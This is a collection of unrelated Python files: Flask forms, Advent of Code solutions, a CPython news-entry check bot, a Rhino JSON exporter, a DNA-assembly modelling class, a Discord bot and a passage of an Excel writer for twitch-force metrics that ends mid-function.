############ Forms ############
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, TextAreaField
from wtforms.validators import DataRequired, Email, EqualTo, Length, Optional
############ Signup ############
class SignupForm(FlaskForm):
username = StringField(
'Username',
validators=[
DataRequired(),
            Length(min=6, message='Username must be at least 6 characters long.')
]
)
password = PasswordField(
'Password',
validators=[
DataRequired(),
Length(min=8, message='Select a stronger password.')
]
)
confirm = PasswordField(
'Confirm your password',
validators=[
DataRequired(),
EqualTo('password', message='Passwords must match')
]
)
submit = SubmitField('Register')
############ Authentication ############
class LoginForm(FlaskForm):
username = StringField(
'Username',
validators=[DataRequired()]
)
password = PasswordField(
'Password',
validators=[DataRequired()]
)
submit = SubmitField('Authenticate')
############ Beam Terminal ############
class TerminalForm(FlaskForm):
terminal = StringField(
'Terminal',
validators=[DataRequired()]
)
############ Make ############
class MakeForm(FlaskForm):
title = StringField(
'Title',
validators=[DataRequired()]
)
protocol = TextAreaField(
'Protocol',
validators=[DataRequired()]
)
poi = TextAreaField(
'Persons of interest',
validators=[DataRequired()]
)
attachment = TextAreaField(
'Dossier attachments',
validators=[DataRequired()]
)
submit = SubmitField('Make')
############ Update ############
class UpdateForm(FlaskForm):
title = StringField(
'Title',
validators=[DataRequired()]
)
protocol = TextAreaField(
'Protocol',
validators=[DataRequired()]
)
poi = TextAreaField(
'Persons of interest',
validators=[DataRequired()]
)
attachment = TextAreaField(
'Dossier attachments',
validators=[DataRequired()]
)
submit = SubmitField('Update')
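############ Usage sketch ############
# A minimal illustration of how one of these forms is typically consumed in a
# Flask view (the route, endpoint names, and template below are assumptions,
# not part of this module):
#
# from flask import redirect, render_template, url_for
#
# @app.route('/signup', methods=['GET', 'POST'])
# def signup():
#     form = SignupForm()
#     if form.validate_on_submit():
#         ...  # create the user from form.username.data / form.password.data
#         return redirect(url_for('login'))
#     return render_template('signup.html', form=form)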
|
import sys
import unittest
def debug(arg):
#pass
print(arg)
def calculate(lines):
    # Each layer of the image is 25 pixels wide and 6 pixels tall.
    layer_length = 25 * 6
    minimum = layer_length + 1
    result = 0
    while lines:
        layer = lines[:layer_length]
        debug(len(layer))
        debug(layer.count('0'))
        debug(layer.count('1'))
        debug(layer.count('2'))
        zeros = layer.count('0')
        # Keep the layer with the fewest zero digits; the answer is the number of
        # ones multiplied by the number of twos on that layer.
        if zeros < minimum:
            result = layer.count('1') * layer.count('2')
            minimum = zeros
        lines = lines[layer_length:]
        debug(minimum)
    return result
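# A small self-check using the unittest module imported above (run with
# `python -m unittest <this module>`). The two layers are synthetic examples,
# not puzzle input: the second layer has fewer zeros, so the expected answer is
# its count of ones multiplied by its count of twos.
class CalculateTest(unittest.TestCase):
    def test_picks_layer_with_fewest_zeros(self):
        layer_one = '0' * 10 + '1' * 70 + '2' * 70  # 10 zeros
        layer_two = '0' * 5 + '1' * 100 + '2' * 45  # 5 zeros -> 100 * 45
        self.assertEqual(calculate(layer_one + layer_two), 4500)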
if __name__=='__main__':
line = sys.stdin.readline().strip()
debug(len(line))
print(calculate(line))
|
"""Check for a news entry."""
import functools
import pathlib
import re
import gidgethub.routing
from . import util
router = gidgethub.routing.Router()
create_status = functools.partial(util.create_status, 'bedevere/news')
BLURB_IT_URL = 'https://blurb-it.herokuapp.com'
BLURB_PYPI_URL = 'https://pypi.org/project/blurb/'
FILENAME_RE = re.compile(r"""# YYYY-mm-dd or YYYY-mm-dd-HH-MM-SS
\d{4}-\d{2}-\d{2}(?:-\d{2}-\d{2}-\d{2})?\.
(?:bpo|gh-issue)-\d+(?:,\d+)*\. # Issue number(s)
[A-Za-z0-9_=-]+\. # Nonce (URL-safe base64)
rst # File extension""",
re.VERBOSE)
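# An entry name matching the pattern above looks like this (the issue number
# and nonce are illustrative): 2021-04-02-01-23-45.gh-issue-12345.AbCdEf.rst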
SKIP_NEWS_LABEL = util.skip_label("news")
SKIP_LABEL_STATUS = create_status(util.StatusState.SUCCESS,
description='"skip news" label found')
HELP = f"""\
Every change to Python [requires a NEWS entry]\
(https://devguide.python.org/committing/#updating-news-and-what-s-new-in-python).
Please, add it using the [blurb_it]({BLURB_IT_URL}) Web app or the [blurb]\
({BLURB_PYPI_URL}) command-line tool."""
async def check_news(gh, pull_request, files=None):
"""Check for a news entry.
The routing is handled through the filepaths module.
"""
if not files:
files = await util.files_for_PR(gh, pull_request)
in_next_dir = file_found = False
for file in files:
if not util.is_news_dir(file['file_name']):
continue
in_next_dir = True
file_path = pathlib.PurePath(file['file_name'])
if len(file_path.parts) != 5: # Misc, NEWS.d, next, <subsection>, <entry>
continue
file_found = True
if FILENAME_RE.match(file_path.name) and len(file['patch']) >= 1:
status = create_status(util.StatusState.SUCCESS,
description='News entry found in Misc/NEWS.d')
break
else:
issue = await util.issue_for_PR(gh, pull_request)
if util.skip("news", issue):
status = SKIP_LABEL_STATUS
else:
if pull_request['author_association'] == 'NONE':
await gh.post(f"{pull_request['issue_url']}/comments",
data={'body': HELP})
if not in_next_dir:
description = f'No news entry in {util.NEWS_NEXT_DIR} or "skip news" label found'
elif not file_found:
description = "News entry not in an appropriate directory"
else:
description = "News entry file name incorrectly formatted"
status = create_status(util.StatusState.FAILURE,
description=description,
target_url=BLURB_IT_URL)
await gh.post(pull_request['statuses_url'], data=status)
@router.register('pull_request', action="labeled")
async def label_added(event, gh, *args, **kwargs):
if util.label_name(event.data) == SKIP_NEWS_LABEL:
await util.post_status(gh, event, SKIP_LABEL_STATUS)
@router.register("pull_request", action="unlabeled")
async def label_removed(event, gh, *args, **kwargs):
if util.no_labels(event.data):
return
elif util.label_name(event.data) == SKIP_NEWS_LABEL:
pull_request = event.data['pull_request']
await check_news(gh, pull_request)
|
# -*- coding: utf-8 -*-
"""Exports a json file with each json object containing the key/value pair of each object from selection."""
import rhinoscriptsyntax as rs
import trkRhinoPy as trp
import json
import ast
# objs = rs.GetObjects('select objects', rs.filter.polysurface, preselect=True)
objs = rs.GetObjects('select objects', preselect=True)
def createObjDict(obj):
# rs.SetUserText(obj, 'objdict')
objkeys = [ x for x in rs.GetUserText(obj) if "BakeName" not in x ]
objvals = map(lambda x: rs.GetUserText(obj, x), objkeys)
return dict(zip(objkeys, objvals))
# rs.SetUserText(obj, 'objdict', dict(zip(objkeys, objvals)))
# Use a list (rather than a lazy map object) so json.dump can serialize it on Python 3 as well.
dataStore = [createObjDict(obj) for obj in objs]
filter = "JSON File (*.json)|*.json|All Files (*.*)|*.*||"
filename = rs.SaveFileName("Save JSON file as", filter)
# If the file name exists, write a JSON string into the file.
if filename:
# Writing JSON data
with open(filename, 'w') as f:
json.dump(dataStore, f)
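# The resulting file is a JSON array with one object per selected Rhino object,
# for example: [{"Layer": "walls", "Area": "12.5"}, ...] (keys and values here
# are purely illustrative; they come from each object's user text).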
# def getObjDict(obj):
# userstr = rs.GetUserText(obj, "objdict")
# objdict = ast.literal_eval(userstr)
# return objdict
# def func(x):
# # trp.setValueByLayer(x,schema['keys'])
# # trp.setBrepHeight(x)
# # trp.setObjAreaValue(x)
# # createKVByVal(x, schema['skeys'], schema['svals'], schema['classkey'], schema['classvals'])
# # setObjDict(x)
# # trp.setSrfAreaValue(x)
# return getObjDict(x)
# objsList = map(func, objs)
# objsDict = {}
# objsDict['objs'] = objsList
# # print type(objsDict)
# # print objsDict['objs'][0]
# # print type(objsList[0])
# # print objsList[0]
# # print(len(objsDict['objs'][0]))
# filter = "JSON File (*.json)|*.json|All Files (*.*)|*.*||"
# filename = rs.SaveFileName("Save JSON file as", filter)
# # If the file name exists, write a JSON string into the file.
# if filename:
# # Writing JSON data
# with open(filename, 'w') as f:
# json.dump(objsDict, f)
|
# Copyright (c) 2019, Build-A-Cell. All rights reserved.
# See LICENSE file in the project root directory for details.
from .component import Component
from .components_basic import DNA, RNA, Protein
from .chemical_reaction_network import ComplexSpecies, Species
from .mechanisms_binding import One_Step_Cooperative_Binding, Combinatorial_Cooperative_Binding
from warnings import warn as pywarn
import itertools as it
import numpy as np
from .dna_assembly_promoter import *
from .dna_assembly_rbs import *
def warn(txt):
pywarn(txt)
class DNAassembly(DNA):
def __init__(self, name: str, dna = None, promoter = None, transcript = None,
rbs = None, protein = None, length = None,
attributes = [], mechanisms = {}, parameters = {}, initial_conc = None,
parameter_warnings = True, **keywords):
self.promoter = None
self.rbs = None
self.transcript = None
self.initial_concentration = initial_conc
self.name = name
DNA.__init__(self, name, length = length, mechanisms = mechanisms,
parameters = parameters, initial_conc = initial_conc,
parameter_warnings = parameter_warnings,
attributes = list(attributes), **keywords)
self.update_dna(dna, attributes = list(attributes))
self.update_transcript(transcript)
self.update_protein(protein)
self.update_promoter(promoter, transcript = self.transcript)
self.update_rbs(rbs, transcript = self.transcript,
protein = self.protein)
self.set_parameter_warnings(parameter_warnings)
def set_parameter_warnings(self, parameter_warnings):
self.parameter_warnings = parameter_warnings
if self.parameter_warnings is not None:
if self.promoter is not None:
self.promoter.set_parameter_warnings(parameter_warnings)
if self.rbs is not None:
self.rbs.set_parameter_warnings(parameter_warnings)
def update_dna(self, dna, attributes = None):
if dna is None:
self.dna = self.set_species(self.name, material_type = "dna", attributes = attributes)
else:
self.dna = self.set_species(dna, material_type = "dna", attributes = attributes)
def update_transcript(self, transcript, attributes = None):
if transcript is None:
self.transcript = self.set_species(self.name, material_type = "rna", attributes = attributes)
else:
self.transcript = self.set_species(transcript, material_type = "rna", attributes = attributes)
if self.promoter is not None:
self.promoter.transcript = self.transcript
if self.rbs is not None:
self.rbs.transcript = self.transcript
def update_protein(self, protein, attributes = None):
if protein is None:
self._protein = self.set_species(self.name, material_type = "protein", attributes = attributes)
else:
self._protein = self.set_species(protein, material_type = "protein", attributes = attributes)
if self.rbs is not None:
            self.rbs.protein = self._protein
def update_promoter(self, promoter, transcript=None):
if transcript is not None:
self.update_transcript(transcript)
if isinstance(promoter, str):
self.promoter = Promoter(assembly = self, name = promoter,
transcript = self.transcript,
parameters = self.parameters)
elif isinstance(promoter, Promoter):
self.promoter = promoter
self.promoter.assembly = self
self.promoter.transcript = self.transcript
elif promoter is not None:
raise ValueError("Improper promoter type recieved by DNAassembly. "
"Expected string or promoter object. "
f"Recieved {repr(promoter)}.")
if promoter is not None:
self.promoter.update_parameters(
mixture_parameters = self.parameters,
overwrite_custom_parameters = False)
def update_rbs(self, rbs, transcript = None, protein = None):
if protein is not None:
self.update_protein(protein)
if transcript is not None:
self.update_transcript(transcript)
if isinstance(rbs, str):
self.rbs = RBS(assembly = self, name = rbs, protein = self._protein,
transcript = self.transcript,
parameters = self.parameters)
elif isinstance(rbs, RBS):
self.rbs = rbs
self.rbs.assembly = self
self.rbs.transcript = self.transcript
self.rbs.protein = self._protein
elif rbs is not None:
raise ValueError("Improper rbs type recieved by DNAassembly. "
"Expected string or RBS object. Recieved "
f"{repr(rbs)}.")
if rbs is not None:
self.rbs.update_parameters(mixture_parameters = self.parameters,
overwrite_custom_parameters = False)
@property
def protein(self):
return self._protein
def update_species(self):
species = []
species.append(self.dna)
if self.promoter is not None and self.rbs is not None:
species += self.promoter.update_species()
species += self.rbs.update_species()
elif self.promoter is not None and self.rbs is None:
species += self.promoter.update_species()
if "rna_degredation" in self.mechanisms and self.promoter is not None:
deg_mech = self.mechanisms["rna_degredation"]
species += deg_mech.update_species(rna = self.transcript, component = self.promoter, part_id = self.transcript.name)
# TODO raise a warning if there were duplicate species
return list(set(species))
def update_reactions(self):
reactions = []
if self.promoter is not None:
self.promoter.parameter_warnings = self.parameter_warnings
reactions += self.promoter.update_reactions()
if self.rbs is not None:
self.rbs.parameter_warnings = self.parameter_warnings
reactions += self.rbs.update_reactions()
if "rna_degredation" in self.mechanisms and self.promoter is not None:
deg_mech = self.mechanisms["rna_degredation"]
reactions += deg_mech.update_reactions(rna = self.transcript, component = self.promoter, part_id = self.transcript.name)
# TODO check that the reaction list is unique
return reactions
def update_parameters(self, mixture_parameters = {}, parameters = {},
overwrite_custom_parameters = True):
DNA.update_parameters(self = self,
mixture_parameters = mixture_parameters,
parameters = parameters,
overwrite_custom_parameters = overwrite_custom_parameters)
if self.promoter is not None:
self.promoter.update_parameters(
mixture_parameters = mixture_parameters,
parameters = parameters,
overwrite_custom_parameters = overwrite_custom_parameters)
if self.rbs is not None:
self.rbs.update_parameters(mixture_parameters = mixture_parameters,
parameters = parameters,
overwrite_custom_parameters = overwrite_custom_parameters)
def update_mechanisms(self, mixture_mechanisms = {}, mechanisms = {},
overwrite_custom_mechanisms = False):
DNA.update_mechanisms(self = self,
mixture_mechanisms = mixture_mechanisms,
mechanisms = mechanisms)
if self.promoter is not None and "transcription" in self.mechanisms:
mech_tx = self.mechanisms["transcription"]
mechs = {"transcription": mech_tx}
self.promoter.update_mechanisms(mechanisms = mechs,
overwrite_custom_mechanisms = overwrite_custom_mechanisms)
if self.rbs is not None and "translation" in self.mechanisms:
mech_tl = self.mechanisms["translation"]
mechs = {"translation": mech_tl}
self.rbs.update_mechanisms(mechanisms = mechs,
overwrite_custom_mechanisms = overwrite_custom_mechanisms)
def __str__(self):
return type(self).__name__ + ": " + self.name
def __repr__(self):
txt = str(self)
if self.promoter is not None:
txt += "\n\t" + repr(self.promoter)
txt += "\n\ttranscript = " + repr(self.transcript)
if self.rbs is not None:
txt += "\n\t" + repr(self.rbs)
txt += "\n\tprotein = " + repr(self._protein)
return txt
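# A minimal usage sketch (illustrative only; the part names "ptet" and "BCD2"
# and the omission of parameter files are assumptions, not defaults of this module):
#
#     assembly = DNAassembly("reporter", promoter="ptet", rbs="BCD2")
#     print(repr(assembly))
#
# Passing strings builds default Promoter/RBS parts; passing Promoter/RBS
# instances attaches them to this assembly instead.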
|
import discord
import asyncio
import birb_token as token
from discord import embeds
from discord.ext import commands
from discord.flags import alias_flag_value
from cogs import bsc_cmd
client = commands.Bot(command_prefix='\'')
c = '```'
#erase default !help command
client.remove_command('help')
#load bsc_cmd cog
client.load_extension('cogs.bsc_cmd')
#on_Ready
@client.event
async def on_ready():
    await asyncio.sleep(0.5)  # brief pause before updating presence
await client.change_presence(
status=discord.Status.online,
activity=discord.Game('Professor Birb | Get \'help'))
print('BOT IS READY!')
#HELP COMMAND: Configurations
@client.command(aliases=['HELP', 'Help'])
async def help(ctx):
embed_help = discord.Embed(title="Professor Birb Commands",
description="All things that I can do, Chirp!",
color=0x00ffbf)
embed_help.add_field(name="'help",
value="All list of commands",
inline=True)
embed_help.add_field(name="'calc",
value="Calculates given equation.",
inline=True)
embed_help.add_field(name="'sqrt",
value="Square root of a number",
inline=True)
embed_help.add_field(name="'sq",
value="Get the square of a number",
inline=True)
embed_help.set_footer(icon_url=ctx.author.avatar_url,
text="Written using python language")
    await asyncio.sleep(0.5)  # brief pause before sending the help embed
await ctx.send(embed=embed_help)
client.run(token.TOKEN)
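# --- Sketch of cogs/bsc_cmd.py ---------------------------------------------
# The cog loaded above is not shown in this file. The following is a minimal,
# illustrative sketch of what it might contain, inferred only from the command
# names listed in the help embed ('sqrt', 'sq'); the real implementation is
# not known.
#
# import math
# from discord.ext import commands
#
# class BscCmd(commands.Cog):
#     def __init__(self, bot):
#         self.bot = bot
#
#     @commands.command()
#     async def sqrt(self, ctx, number: float):
#         await ctx.send(f'```{math.sqrt(number)}```')
#
#     @commands.command()
#     async def sq(self, ctx, number: float):
#         await ctx.send(f'```{number ** 2}```')
#
# def setup(bot):
#     bot.add_cog(BscCmd(bot))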
|
from utils.solution_base import SolutionBase
class Solution(SolutionBase):
keys = ["byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid", "cid"]
def solve(self, part_num: int):
self.test_runner(part_num)
func = getattr(self, f"part{part_num}")
result = func(self.data)
return result
def test_runner(self, part_num):
test_inputs = self.get_test_input()
test_results = self.get_test_result(part_num)
test_counter = 1
func = getattr(self, f"part{part_num}")
for i, r in zip(test_inputs, test_results):
if func(i) == int(r[0]):
print(f"test {test_counter} passed")
else:
print(f"test {test_counter} NOT passed")
test_counter += 1
print()
def part1(self, data):
return max(self.__get_all_seat_id(data))
def part2(self, data):
seats = ["0"] * 8 * 128
for i in self.__get_all_seat_id(data):
seats[i] = "1"
return "".join(seats).index("101") + 1
def __get_all_seat_id(self, b_pass_all):
return [self.__get_seat_id(b_pass) for b_pass in b_pass_all]
    def __get_seat_id(self, b_pass):
        # The first 7 characters (F/B) binary-partition the row, the last 3 (L/R) the column.
        rows, cols = b_pass[:7], b_pass[7:]
        row_range = [0, 127]
        col_range = [0, 7]
        # __shrink_range mutates the range list in place and the comprehension collects
        # references to that same list, so [0][0] reads the fully narrowed lower bound,
        # which equals the final row/column.
        row = [self.__shrink_range(row_range, type) for type in rows][0][0]
        col = [self.__shrink_range(col_range, type) for type in cols][0][0]
        return row * 8 + col
    def __shrink_range(self, pos_range, type):
        # F/L keep the lower half of the current range, B/R keep the upper half.
        if type in ["F", "L"]:
            pos_range[1] = pos_range[0] + (pos_range[1] - pos_range[0]) // 2
        elif type in ["B", "R"]:
            pos_range[0] = (sum(pos_range) + 1) // 2
        return pos_range
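# Worked example from the puzzle statement: the boarding pass "FBFBBFFRLR"
# decodes to row 44, column 5, i.e. seat ID 44 * 8 + 5 = 357.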
|
# -*- coding: utf-8 -*-
"""Docstring."""
import datetime
import logging
import math
import os
import tempfile
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
from typing import Union
import uuid
from uuid import UUID
import zipfile
from mantarray_file_manager import MAIN_FIRMWARE_VERSION_UUID
from mantarray_file_manager import MANTARRAY_SERIAL_NUMBER_UUID
from mantarray_file_manager import METADATA_UUID_DESCRIPTIONS
from mantarray_file_manager import PLATE_BARCODE_UUID
from mantarray_file_manager import PlateRecording as FileManagerPlateRecording
from mantarray_file_manager import SOFTWARE_BUILD_NUMBER_UUID
from mantarray_file_manager import SOFTWARE_RELEASE_VERSION_UUID
from mantarray_file_manager import UTC_BEGINNING_RECORDING_UUID
from mantarray_file_manager import WellFile
from mantarray_waveform_analysis import AMPLITUDE_UUID
from mantarray_waveform_analysis import CENTIMILLISECONDS_PER_SECOND
from mantarray_waveform_analysis import CONTRACTION_TIME_UUID
from mantarray_waveform_analysis import CONTRACTION_VELOCITY_UUID
from mantarray_waveform_analysis import IRREGULARITY_INTERVAL_UUID
from mantarray_waveform_analysis import Pipeline
from mantarray_waveform_analysis import PipelineTemplate
from mantarray_waveform_analysis import RELAXATION_TIME_UUID
from mantarray_waveform_analysis import RELAXATION_VELOCITY_UUID
from mantarray_waveform_analysis import TIME_DIFFERENCE_UUID
from mantarray_waveform_analysis import TooFewPeaksDetectedError
from mantarray_waveform_analysis import TWITCH_FREQUENCY_UUID
from mantarray_waveform_analysis import TWITCH_PERIOD_UUID
from mantarray_waveform_analysis import TwoPeaksInARowError
from mantarray_waveform_analysis import TwoValleysInARowError
from mantarray_waveform_analysis import WIDTH_FALLING_COORDS_UUID
from mantarray_waveform_analysis import WIDTH_RISING_COORDS_UUID
from mantarray_waveform_analysis import WIDTH_UUID
from mantarray_waveform_analysis import WIDTH_VALUE_UUID
from mantarray_waveform_analysis.exceptions import PeakDetectionError
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
from nptyping import NDArray
import numpy as np
from scipy import interpolate
from stdlib_utils import configure_logging
import xlsxwriter
from xlsxwriter import Workbook
from xlsxwriter.format import Format
from xlsxwriter.utility import xl_col_to_name
from .constants import AGGREGATE_METRICS_SHEET_NAME
from .constants import ALL_FORMATS
from .constants import CALCULATED_METRIC_DISPLAY_NAMES
from .constants import CHART_FIXED_WIDTH
from .constants import CHART_FIXED_WIDTH_CELLS
from .constants import CHART_HEIGHT
from .constants import CHART_HEIGHT_CELLS
from .constants import CHART_WINDOW_NUM_SECONDS
from .constants import CONTINUOUS_WAVEFORM_SHEET_NAME
from .constants import CONTRACTION_COORDINATES_DISPLAY_NAMES
from .constants import CONTRACTION_TIME_DIFFERENCE_DISPLAY_NAMES
from .constants import DEFAULT_CELL_WIDTH
from .constants import FORCE_FREQUENCY_RELATIONSHIP_SHEET
from .constants import FULL_CHART_SHEET_NAME
from .constants import INTERPOLATED_DATA_PERIOD_CMS
from .constants import INTERPOLATED_DATA_PERIOD_SECONDS
from .constants import METADATA_EXCEL_SHEET_NAME
from .constants import METADATA_INSTRUMENT_ROW_START
from .constants import METADATA_OUTPUT_FILE_ROW_START
from .constants import METADATA_RECORDING_ROW_START
from .constants import MICRO_TO_BASE_CONVERSION
from .constants import MICROSECONDS_PER_CENTIMILLISECOND
from .constants import NUMBER_OF_PER_TWITCH_METRICS
from .constants import PACKAGE_VERSION
from .constants import PEAK_VALLEY_COLUMN_START
from .constants import PER_TWITCH_METRICS_SHEET_NAME
from .constants import RELAXATION_COORDINATES_DISPLAY_NAMES
from .constants import RELAXATION_TIME_DIFFERENCE_DISPLAY_NAMES
from .constants import SECONDS_PER_CELL
from .constants import SNAPSHOT_CHART_SHEET_NAME
from .constants import TSP_TO_DEFAULT_FILTER_UUID
from .constants import TWENTY_FOUR_WELL_PLATE
from .constants import TWITCH_FREQUENCIES_CHART_SHEET_NAME
from .constants import TWITCH_WIDTH_METRIC_DISPLAY_NAMES
from .excel_well_file import ExcelWellFile
logger = logging.getLogger(__name__)
configure_logging(logging_format="notebook")
def _write_per_twitch_metric_labels(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
twitch_width_values: Tuple[int, ...],
twitch_coordinate_values: Tuple[int, ...],
twitch_time_diff_values: Tuple[int, ...],
) -> int:
for iter_metric_uuid, iter_metric_name in CALCULATED_METRIC_DISPLAY_NAMES.items():
if iter_metric_uuid == TIME_DIFFERENCE_UUID:
continue
curr_sheet.write(curr_row, 0, iter_metric_name)
curr_row += 1
for iter_width_percent, iter_metric_name in TWITCH_WIDTH_METRIC_DISPLAY_NAMES.items():
if iter_width_percent in twitch_width_values:
curr_sheet.write(curr_row, 0, iter_metric_name)
curr_row += 1
for iter_width_percent, iter_metric_name in CONTRACTION_COORDINATES_DISPLAY_NAMES.items():
if iter_width_percent in twitch_coordinate_values:
curr_sheet.write(curr_row, 0, f"{iter_metric_name} (seconds)")
curr_row += 1
curr_sheet.write(curr_row, 0, f"{iter_metric_name} (μN)")
curr_row += 1
for iter_width_percent, iter_metric_name in RELAXATION_COORDINATES_DISPLAY_NAMES.items():
if iter_width_percent in twitch_coordinate_values:
curr_sheet.write(curr_row, 0, f"{iter_metric_name} (seconds)")
curr_row += 1
curr_sheet.write(curr_row, 0, f"{iter_metric_name} (μN)")
curr_row += 1
for iter_width_percent, iter_metric_name in CONTRACTION_TIME_DIFFERENCE_DISPLAY_NAMES.items():
if iter_width_percent in twitch_time_diff_values:
curr_sheet.write(curr_row, 0, iter_metric_name)
curr_row += 1
for iter_width_percent, iter_metric_name in RELAXATION_TIME_DIFFERENCE_DISPLAY_NAMES.items():
if iter_width_percent in twitch_time_diff_values:
curr_sheet.write(curr_row, 0, iter_metric_name)
curr_row += 1
return curr_row
def _write_per_twitch_metric_values(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
per_twitch_dict: Dict[
int,
Dict[
UUID,
Union[
Dict[int, Dict[UUID, Union[Tuple[int, int], int]]],
Union[float, int],
],
],
],
number_twitches: int,
twitch_width_values: Tuple[int, ...],
twitch_coordinate_values: Tuple[int, ...],
force_minimum_value: float,
twitch_time_diff_values: Tuple[int, ...],
) -> int:
for iter_twitch_index in range(number_twitches):
curr_sheet.write(curr_row, iter_twitch_index + 1, f"Twitch {iter_twitch_index + 1}")
curr_row += 1
twitch_timepoints = list(per_twitch_dict)
for iter_twitch_index in range(number_twitches):
curr_sheet.write(
curr_row,
iter_twitch_index + 1,
twitch_timepoints[iter_twitch_index] / CENTIMILLISECONDS_PER_SECOND,
)
curr_row += 1
for iter_metric_uuid, _ in CALCULATED_METRIC_DISPLAY_NAMES.items():
if iter_metric_uuid == TIME_DIFFERENCE_UUID:
continue
for iter_twitch_index in range(number_twitches):
timepoint = twitch_timepoints[iter_twitch_index]
value_to_write = per_twitch_dict[timepoint][iter_metric_uuid]
if iter_metric_uuid == AMPLITUDE_UUID:
if not isinstance(value_to_write, float):
raise NotImplementedError(f"The value under key {AMPLITUDE_UUID} must be a float.")
value_to_write *= MICRO_TO_BASE_CONVERSION
if iter_metric_uuid in (TWITCH_PERIOD_UUID, IRREGULARITY_INTERVAL_UUID):
value_to_write /= CENTIMILLISECONDS_PER_SECOND
if iter_metric_uuid in (CONTRACTION_VELOCITY_UUID, RELAXATION_VELOCITY_UUID):
value_to_write *= CENTIMILLISECONDS_PER_SECOND * MICRO_TO_BASE_CONVERSION
try:
curr_sheet.write(curr_row, iter_twitch_index + 1, value_to_write)
except TypeError:
pass
curr_row += 1
new_row = _write_twitch_width_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_width_values,
)
curr_row = new_row
new_row = _write_twitch_coordinate_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_coordinate_values,
True,
force_minimum_value,
)
curr_row = new_row
new_row = _write_twitch_coordinate_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_coordinate_values,
False,
force_minimum_value,
)
curr_row = new_row
new_row = _write_twitch_time_diff_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_time_diff_values,
True,
)
curr_row = new_row
new_row = _write_twitch_time_diff_values(
curr_sheet,
curr_row,
per_twitch_dict,
number_twitches,
twitch_time_diff_values,
False,
)
curr_row = new_row
n_display_names = len(CALCULATED_METRIC_DISPLAY_NAMES)
if TIME_DIFFERENCE_UUID in CALCULATED_METRIC_DISPLAY_NAMES:
n_display_names -= 1
curr_row += (
-2
- n_display_names
- len(twitch_width_values)
- (4 * len(twitch_coordinate_values))
- (2 * len(twitch_time_diff_values))
) # revert back to initial row (number of metrics + 1)
return curr_row
def _write_twitch_time_diff_values(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
per_twitch_dict: Dict[
int,
Dict[
UUID,
Union[
Dict[int, Dict[UUID, Union[Tuple[int, int], int]]],
Union[float, int],
],
],
],
number_twitches: int,
twitch_time_diff_values: Tuple[int, ...],
is_contraction: bool,
) -> int:
if is_contraction:
display_names = CONTRACTION_TIME_DIFFERENCE_DISPLAY_NAMES
coord_uuid = WIDTH_RISING_COORDS_UUID
else:
display_names = RELAXATION_TIME_DIFFERENCE_DISPLAY_NAMES
coord_uuid = WIDTH_FALLING_COORDS_UUID
twitch_timepoints = list(per_twitch_dict)
for iter_width_percent, _ in display_names.items():
if iter_width_percent in twitch_time_diff_values:
for iter_twitch_index in range(number_twitches):
timepoint = twitch_timepoints[iter_twitch_index]
value_to_write = per_twitch_dict[timepoint][WIDTH_UUID]
if not isinstance(value_to_write, dict):
raise NotImplementedError(
f"The width value under key {WIDTH_VALUE_UUID} must be a dictionary."
)
coordinates = value_to_write[iter_width_percent][coord_uuid]
if not isinstance(coordinates, tuple):
raise NotImplementedError(f"The coordinate value under key {coord_uuid} must be a tuple.")
x_value: float
x_value, _ = coordinates
if is_contraction:
x_value = (timepoint - x_value) / CENTIMILLISECONDS_PER_SECOND
else:
x_value = (x_value - timepoint) / CENTIMILLISECONDS_PER_SECOND
x_value = round(x_value, 5)
curr_sheet.write(curr_row, iter_twitch_index + 1, x_value)
curr_row += 1
return curr_row
def _write_twitch_width_values(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
per_twitch_dict: Dict[
int,
Dict[
UUID,
Union[
Dict[int, Dict[UUID, Union[Tuple[int, int], int]]],
Union[float, int],
],
],
],
number_twitches: int,
twitch_width_values: Tuple[int, ...],
) -> int:
twitch_timepoints = list(per_twitch_dict)
for iter_width_percent, _ in TWITCH_WIDTH_METRIC_DISPLAY_NAMES.items():
if iter_width_percent in twitch_width_values:
for iter_twitch_index in range(number_twitches):
timepoint = twitch_timepoints[iter_twitch_index]
value_to_write = per_twitch_dict[timepoint][WIDTH_UUID]
if not isinstance(value_to_write, dict):
raise NotImplementedError(
f"The width value under key {WIDTH_VALUE_UUID} must be a dictionary."
)
width_val = (
value_to_write[iter_width_percent][WIDTH_VALUE_UUID] / CENTIMILLISECONDS_PER_SECOND
)
width_val = round(width_val, 5)
curr_sheet.write(curr_row, iter_twitch_index + 1, width_val)
curr_row += 1
return curr_row
def _write_twitch_coordinate_values(
curr_sheet: xlsxwriter.worksheet.Worksheet,
curr_row: int,
per_twitch_dict: Dict[
int,
Dict[
UUID,
Union[
Dict[int, Dict[UUID, Union[Tuple[int, int], int]]],
Union[float, int],
],
],
],
number_twitches: int,
twitch_coordinate_values: Tuple[int, ...],
is_contraction: bool,
force_minimum_value: float,
) -> int:
if is_contraction:
display_names = CONTRACTION_COORDINATES_DISPLAY_NAMES
coord_uuid = WIDTH_RISING_COORDS_UUID
else:
display_names = RELAXATION_COORDINATES_DISPLAY_NAMES
coord_uuid = WIDTH_FALLING_COORDS_UUID
twitch_timepoints = list(per_twitch_dict)
for iter_width_percent, _ in display_names.items():
if iter_width_percent in twitch_coordinate_values:
for iter_twitch_index in range(number_twitches):
timepoint = twitch_timepoints[iter_twitch_index]
value_to_write = per_twitch_dict[timepoint][WIDTH_UUID]
if not isinstance(value_to_write, dict):
raise NotImplementedError(
f"The width value under key {WIDTH_VALUE_UUID} must be a dictionary."
)
coordinates = value_to_write[iter_width_percent][coord_uuid]
if not isinstance(coordinates, tuple):
raise NotImplementedError(f"The coordinate value under key {coord_uuid} must be a tuple.")
y_value: float
x_value: float
x_value, y_value = coordinates
x_value /= CENTIMILLISECONDS_PER_SECOND
x_value = round(x_value, 5)
y_value *= MICRO_TO_BASE_CONVERSION
y_value -= force_minimum_value
curr_sheet.write(curr_row, iter_twitch_index + 1, x_value)
curr_row += 1
curr_sheet.write(curr_row, iter_twitch_index + 1, y_value)
